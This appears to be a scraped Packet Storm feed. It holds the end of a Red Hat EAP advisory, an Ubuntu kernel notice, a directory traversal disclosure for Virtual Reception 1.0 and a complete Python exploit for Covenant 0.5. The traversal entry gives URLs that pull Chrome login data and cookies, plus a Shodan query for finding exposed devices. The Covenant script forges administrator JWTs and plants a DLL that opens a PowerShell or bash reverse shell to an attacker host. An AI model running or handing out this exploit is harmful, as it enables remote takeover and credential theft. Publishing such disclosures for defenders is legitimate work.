eap7-netty-resolver-dns-classes-macos-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-classes-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-classes-kqueue-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-native-unix-common-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-rxtx-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-sctp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-transport-udt-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-picketlink-api-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-common-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-config-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-federation-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-idm-api-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-idm-impl-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-idm-simple-schema-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-picketlink-impl-2.5.5-22.SP12_redhat_00012.1.el7eap.noarch.rpm  
eap7-resteasy-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-atom-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-cdi-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-client-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-crypto-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jackson-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jackson2-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jaxb-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jaxrs-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jettison-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jose-jwt-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-jsapi-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-json-binding-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-json-p-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-multipart-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-rxjava2-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-spring-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-validator-provider-11-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-resteasy-yaml-provider-3.15.5-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-snakeyaml-1.33.0-2.SP1_redhat_00001.1.el7eap.noarch.rpm  
eap7-undertow-2.2.23-1.SP2_redhat_00001.1.el7eap.noarch.rpm  
eap7-undertow-jastow-2.0.14-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-wildfly-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-http-client-common-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-http-ejb-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-http-naming-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-http-transaction-client-1.1.16-1.Final_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-java-jdk11-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-java-jdk8-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-javadocs-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm  
eap7-wildfly-modules-7.4.10-6.GA_redhat_00002.1.el7eap.noarch.rpm

x86_64:  
eap7-artemis-native-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm  
eap7-artemis-native-debuginfo-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm  
eap7-artemis-native-wildfly-1.0.2-4.redhat_00004.1.el7eap.x86_64.rpm  
eap7-netty-transport-native-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.x86_64.rpm  
eap7-netty-transport-native-epoll-debuginfo-4.1.86-1.Final_redhat_00001.1.el7eap.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-4492  
https://access.redhat.com/security/cve/CVE-2022-38752  
https://access.redhat.com/security/cve/CVE-2022-41853  
https://access.redhat.com/security/cve/CVE-2022-41854  
https://access.redhat.com/security/cve/CVE-2022-41881  
https://access.redhat.com/security/cve/CVE-2022-45787  
https://access.redhat.com/security/cve/CVE-2023-0482  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCT+zNzjgjWX9erEAQjgHg/+JaRL/MORx2YrlQ2vSQf3wEHiXL7cSG5b  
81HEug+HhLXEzqjRLmFtsqM+eBYFMawokVsOX0PBat7yyJUcwttn7NdO8MlEvrKA  
Juh3RHqCSJPE3X5N7OnKTkdJUs7Zxfvmzo6mIly321gjUl51bxl/yVPzXuBiI89S  
rPgI1n6wdp4Tb/HDxZ5h2rAX7L8xckVzHnr3ld8MG3Mi2CqrvSnLkYy1YsAxiSrF  
Q8tT1dCnCAjUEA2wULxq0a+PrH5cCpkBJ8d6w5Y9lxGKuF1dYzUQAIaDuCvTw4w4  
7i5g5Gt3X+/uks/8y00NWxDOTHWnzvlHTT7NWZAtSD1PwknaGQJ4dGPJMUo+Y2Tt  
cVuxyhcfQMixEc6+P6EwJrdWuaa6MdU8rceWKFc/a8X//BefU0chSAGi9CfXsC1y  
WBR75mfFZleVPRoJtQ0ZLz+Se0rsKwxV9F/FbHlcAhCvaZzbDi2PAHH3YhPqMcmu  
JdgRJlT/xBDeZMqb+4U9aiwKox53tuXW7ACUZeN8dlP/pCLiiFFaW0jaObR5zfVy  
R51T2b2Lyt7HHkxp/GGXNOfZHjkgYDHGssduzDADhMthLPLJrJb9jQdWRrkjFagt  
4agw2EM+/mtBpB4Wcsp1CXb61UfU4jv0O5BPIvHx81l+vqZRKVuICmCb4FI/wnEi  
fsWX8UaljMw=  
=qlyL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1512-01

Ubuntu Security Notice 5987-1 - It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5987-1  
March 29, 2023

linux-gke, linux-gke-5.15, linux-ibm, linux-kvm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds write vulnerability. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-48423)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2022-48424)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that the KSMBD implementation in the Linux kernel did not  
properly validate buffer lengths, leading to a heap-based buffer overflow.  
A remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2023-0210)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the class-based queuing discipline implementation  
in the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23454)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly handle a loop termination condition, leading to an  
out-of-bounds read vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-26606)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1027-ibm     5.15.0-1027.30  
   linux-image-5.15.0-1030-gke     5.15.0-1030.35  
   linux-image-5.15.0-1030-kvm     5.15.0-1030.35  
   linux-image-gke                 5.15.0.1030.29  
   linux-image-gke-5.15            5.15.0.1030.29  
   linux-image-ibm                 5.15.0.1027.23  
   linux-image-kvm                 5.15.0.1030.26

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1029-gke     5.15.0-1029.34~20.04.1  
   linux-image-gke-5.15            5.15.0.1029.34~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5987-1  
   CVE-2022-2196, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-4382, CVE-2022-48423, CVE-2022-48424, CVE-2023-0045,  
   CVE-2023-0210, CVE-2023-0266, CVE-2023-23454, CVE-2023-23455,  
   CVE-2023-23559, CVE-2023-26606, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1030.35  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1027.30  
   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1030.35  
   https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1029.34~20.04.1

Ubuntu Security Notice USN-5987-1

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

    # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

Virtual Reception 1.0 Directory Traversal

Covenant version 0.5 suffers from a remote code execution vulnerability.

    # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:##   - https://blog.null.farm/hunting-the-hunters##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt  # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request  # pip3 install requestsfrom subprocess import runfrom pwn import remote, context  # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements():    if which("mcs") is None:        print("Please install the mono framework in order to compile the payload.")        print("https://www.mono-project.com/download/stable/")        exit(-1)def random_hex(length):    alphabet = "0123456789abcdef"    return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""):    warnings.simplefilter('ignore', InsecureRequestWarning)    return request(        method,        f"{args.target}/api/{route}",        json=body,        headers={            "Authorization": f"Bearer {token}",            "Content-Type": "application/json"        },        verify=False    )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'    payload_data = {        "sub": username,        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [            "User",            "Administrator"        ],        "exp": int(time()) + 360,        "iss": "Covenant",        "aud": "Covenant"    }    token = jwt.encode(payload_data, secret_key, algorithm='HS256')    return tokendef get_id_admin(token, json_roles):    id_admin = ""    for role in json_roles:        if role["name"] == "Administrator":            id_admin = role["id"]            print(f"\t[*] Found the admin group id : {id_admin}")            break    else:        print("\t[!] Did not found admin group id, quitting !")        exit(-1)    id_admin_user = ""    json_users_roles = request_api("get", token, f"users/roles").json()    for user_role in json_users_roles:        if user_role["roleId"] == id_admin:            id_admin_user = user_role["userId"]            print(f"\t[*] Found the admin user id : {id_admin_user}")            break    else:            print("\t[!] Did not found admin id, quitting !")        exit(-1)    json_users = request_api("get", token, f"users").json()    for user in json_users:        if user["id"] == id_admin_user:            username_admin = user["userName"]            print(f"\t[*] Found the admin username : {username_admin}")            return username_admin, id_admin_user    else:            print("\t[!] Did not found admin username, quitting !")        exit(-1)def compile_payload():    if args.os == "windows":        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'    else:        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'    dll = """using System;using System.Reflection;namespace ExampleDLL{    public class Class1{        public Class1(){        }        public void Main(string[] args){            System.Diagnostics.Process.Start(""" + payload + """);        }    }}"""    temp_dll_path = f"/tmp/{random_hex(8)}"    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())    print(f"\t[*] Writing payload in {temp_dll_path}.cs")    compilo_path = which("mcs")    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])    if compilation.returncode:        print("\t[!] Error when compiling DLL, quitting !")        exit(-1)    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()    remove(temp_dll_path + ".cs")    remove(temp_dll_path + ".dll")    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")    return dll_encodeddef generate_wrapper(dll_encoded):    wrapper = """public static class MessageTransform {    public static string Transform(byte[] bytes) {        try {            string assemblyBase64 = \"""" + dll_encoded + """\";            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);            var assembly = System.Reflection.Assembly.Load(assemblyBytes);            foreach (var type in assembly.GetTypes()) {                object instance = System.Activator.CreateInstance(type);                object[] args = new object[] { new string[] { \"\" } };                try {                    type.GetMethod(\"Main\").Invoke(instance, args);                }                catch {}            }        }        catch {}        return System.Convert.ToBase64String(bytes);    }    public static byte[] Invert(string str) {        return System.Convert.FromBase64String(str);    }}"""    return wrapperdef upload_profile(token, wrapper):    body = {        'httpUrls': [            '/en-us/index.html',            '/en-us/docs.html',            '/en-us/test.html'        ],        'httpRequestHeaders': [            {'name': 'User-Agent',             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '                      'Safari/537.36'},            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}        ],        'httpResponseHeaders': [            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}        ],        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',        'httpGetResponse': '{DATA}',        'httpPostResponse': '{DATA}',        'id': 0,        'name': random_hex(8),        'description': '',        'type': 'HTTP',        'messageTransform': wrapper    }    response = request_api("post", token, "profiles/http", body)    if not response.ok:        print("\t[!] Failed to create the listener profile, quitting !")        exit(-1)    else:        profile_id = response.json().get('id')        print(f"\t[*] Profile created with id {profile_id}")        print("\t[*] Successfully created the listener profile")        return profile_iddef generate_valid_listener_port(impersonate_token, tries=0):    if tries >= 10:        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")        exit(-1)    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT    listeners = request_api("get", impersonate_token, "listeners").json()    port_used = []    for listener in listeners:        port_used.append(listener["bindPort"])    if port in port_used:        print(f"\t[!] Port {port} is already taken by another listener, retrying !")        generate_valid_listener_port(impersonate_token, tries + 1)    else:        print(f"\t[*] Port {port} seems free")        return portdef get_id_listener_type(impersonate_token, listener_name):    response = request_api("get", impersonate_token, "listeners/types")    if not response.ok:        print("\t[!] Failed to get the listener type, quitting !")        exit(-1)    else:        for listener_type in response.json():            if listener_type["name"] == listener_name:                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')                return listener_type["id"]def generate_listener(impersonate_token, profile_id):    listener_port = generate_valid_listener_port(impersonate_token)    listener_name = random_hex(8)    data = {        'useSSL': False,        'urls': [            f"http://0.0.0.0:{listener_port}"        ],        'id': 0,        'name': listener_name,        'bindAddress': "0.0.0.0",        'bindPort': listener_port,        'connectAddresses': [            "0.0.0.0"        ],        'connectPort': listener_port,        'profileId': profile_id,        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),        'status': 'Active'    }    response = request_api("post", impersonate_token, "listeners/http", data)    if not response.ok:        print("\t[!] Failed to create the listener, quitting !")        exit(-1)    else:        print("\t[*] Successfully created the listener")        listener_id = response.json().get("id")        return listener_id, listener_portdef create_grunt(impersonate_token, data):    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]    if stager_code == "":        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]        if stager_code == "":            print("\t[!] Failed to create the grunt payload, quitting !")            exit(-1)    print("\t[*] Successfully created the grunt payload")    return stager_codedef get_grunt_config(impersonate_token, listener_id):    data = {        'id': 0,        'listenerId': listener_id,        'implantTemplateId': 1,        'name': 'Binary',        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',        'type': 'binary',        'dotNetVersion': 'Net35',        'runtimeIdentifier': 'win_x64',        'validateCert': True,        'useCertPinning': True,        'smbPipeName': 'string',        'delay': 0,        'jitterPercent': 0,        'connectAttempts': 0,        'launcherString': 'GruntHTTP.exe',        'outputKind': 'consoleApplication',        'compressStager': False    }    stager_code = create_grunt(impersonate_token, data)    aes_key = re.search(r'FromBase64String$@\"(.[A-Za-z0-9+\/=]{40,50}?)\"$;', stager_code)    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)    if not aes_key or not guid_prefix:        print("\t[!] Failed to retrieve the grunt configuration, quitting !")        exit(-1)    aes_key = aes_key.group(1)    guid_prefix = guid_prefix.group(1)    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")    return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message):    iv_bytes = urandom(16)    key_decoded = base64.b64decode(key)    encoded_message = pad(message.encode(), 16)    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)    encrypted = cipher.encrypt(encoded_message)    hmac = HMAC.new(key_decoded, digestmod=SHA256)    signature = hmac.update(encrypted).digest()    return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid):    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)    data = {        "GUID": guid,        "Type": 0,        "Meta": '',        "IV": base64.b64encode(iv).decode(),        "EncryptedMessage": base64.b64encode(ciphered).decode(),        "HMAC": base64.b64encode(signature).decode()    }    json_data = json.dumps(data).encode("utf-8")    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"    if send_exploit(listener_port, "Cookie", guid, payload):        print("\t[*] Exploit succeeded, check listener")    else :        print("\t[!] Exploit failed, retrying")        if send_exploit(listener_port, "Cookies", guid, payload):            print("\t[*] Exploit succeeded, check listener")        else:            print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload):    context.log_level = 'error'    request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode()    sock = remote(IP_TARGET, listener_port)    sock.sendline(request)    response = sock.recv().decode()    sock.close()    if "HTTP/1.1 200 OK" in response:        return True    else:        return Falseif __name__ == "__main__":    check_requirements()    parser = argparse.ArgumentParser()    parser.add_argument("target",                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")    parser.add_argument("os",                        help="Operating System of the target",                        choices=["windows", "linux"])    parser.add_argument("lhost",                        help="IP of the machine that will receive the reverse shell")    parser.add_argument("lport",                        help="Port of the machine that will receive the reverse shell")    args = parser.parse_args()    IP_TARGET = urlparse(args.target).hostname    print("[*] Getting the admin info")    sacrificial_token = craft_jwt("xThaz")    roles = request_api("get", sacrificial_token, "roles").json()    admin_username, admin_id = get_id_admin(sacrificial_token, roles)    impersonate_token = craft_jwt(admin_username, admin_id)    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")    print("[*] Generating payload")    dll_encoded = compile_payload()    wrapper = generate_wrapper(dll_encoded)    print("[*] Uploading malicious listener profile")    profile_id = upload_profile(impersonate_token, wrapper)    print("[*] Generating listener")    listener_id, listener_port = generate_listener(impersonate_token, profile_id)    print("[*] Triggering the exploit")    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

Source

Packet Storm